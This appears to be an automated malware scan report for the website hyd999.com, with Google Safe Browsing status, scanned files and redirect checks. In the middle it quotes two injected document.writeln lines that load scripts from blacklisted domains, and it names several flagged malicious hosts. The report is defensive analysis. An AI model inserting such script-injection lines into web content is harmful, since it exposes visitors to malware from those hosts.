Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hyd999.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hyd999.com/ | 200 OK Content-Length: 11836 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.lys66.com | ||
http://js.njyoukun.com/mobile_464_1154.js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://js.njyoukun.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://hyd999.com/static/mulu2/tj.js | 200 OK Content-Length: 406 Content-Type: application/javascript | clean |
http://hyd999.com/gg/top.js | 200 OK Content-Length: 244 Content-Type: application/javascript | suspicious |
Page code contains blacklisted domain: www.159gps.com document.writeln("<script language=\"javascript\" type=\"text/javascript\" src=\"http://www.159gps.com/gg/zhanqun.js\"></script>");
document.writeln("<script src=\"http://www.vshinantam.com/gg/indexbom.js\" language=\"javascript\"></script>"); | ||
http://hyd999.com/indexbom.js | 200 OK Content-Length: 2981 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.zoudi6.biz |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hyd999.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 08 Aug 2014 18:02:52 GMT
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
X-Powered-By: PHP/5.3.10-1ubuntu3.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: hyd999.com
Referer: http://www.google.com/search?q=hyd999.com
Result:
The result is similar to the first query. There are no suspicious redirects found.